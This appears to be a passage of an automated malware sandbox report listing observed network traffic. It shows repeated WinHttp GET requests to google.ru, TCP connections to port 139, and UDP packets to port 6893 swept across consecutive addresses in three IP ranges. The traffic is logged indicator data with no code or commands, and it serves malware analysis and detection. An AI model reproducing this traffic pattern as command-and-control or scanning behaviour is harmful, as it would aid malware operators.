          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficTCP traffic: 192.168.2.5:49791 -> 13.107.5.88:139
          Source: global trafficTCP traffic: 192.168.2.5:49800 -> 37.187.79.168:139
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.0:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.1:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.2:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.3:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.4:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.5:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.6:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.7:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.8:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.9:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.10:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.11:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.12:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.13:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.14:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.15:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.16:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.17:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.18:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.19:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.20:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.21:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.22:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.23:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.24:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.25:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.26:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.27:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.28:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.29:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.30:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 93.107.12.31:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.0:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.1:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.2:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.3:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.4:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.5:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.6:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.7:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.8:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.9:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.10:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.11:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.12:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.13:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.14:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.15:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.16:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.17:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.18:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.19:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.20:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.21:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.22:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.23:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.24:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.25:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.26:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.27:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.28:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.29:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.30:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 95.1.200.31:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.0:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.1:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.2:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.3:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.4:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.5:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.6:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.7:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.8:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.9:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.10:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.11:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.12:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.13:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.14:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.15:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.16:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.17:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.18:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.19:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.20:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.21:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.22:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.23:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.24:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.25:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.26:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.27:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.28:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.29:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.30:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.31:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.32:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.33:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.34:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.35:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.36:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.37:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.38:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.39:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.40:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.41:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.42:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.43:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.44:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.45:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.46:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.47:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.48:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.49:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.50:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.52:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.51:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.53:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.54:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.55:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.56:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.57:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.58:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.59:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.60:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.61:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.62:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.63:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.64:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.65:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.66:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.67:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.68:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.69:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.70:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.71:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.72:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.73:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.74:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.75:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.76:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.77:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.78:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.79:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.80:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.81:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.82:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.83:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.84:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.85:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.86:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.87:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.88:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.89:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.90:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.91:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.92:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.93:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.94:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.95:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.96:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.97:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.98:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.99:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.100:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.101:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.102:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.103:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.104:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.105:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.106:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.107:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.108:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.109:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.110:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.111:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.112:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.113:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.114:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.115:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.116:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.117:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.118:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.119:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.120:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.121:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.122:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.123:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.124:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.125:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.126:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.127:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.128:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.129:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.130:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.131:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.132:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.133:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.134:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.135:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.136:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.137:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.138:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.139:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.140:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.141:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.142:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.143:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.144:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.145:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.146:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.147:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.148:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.149:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.150:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.151:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.152:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.153:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.154:6893
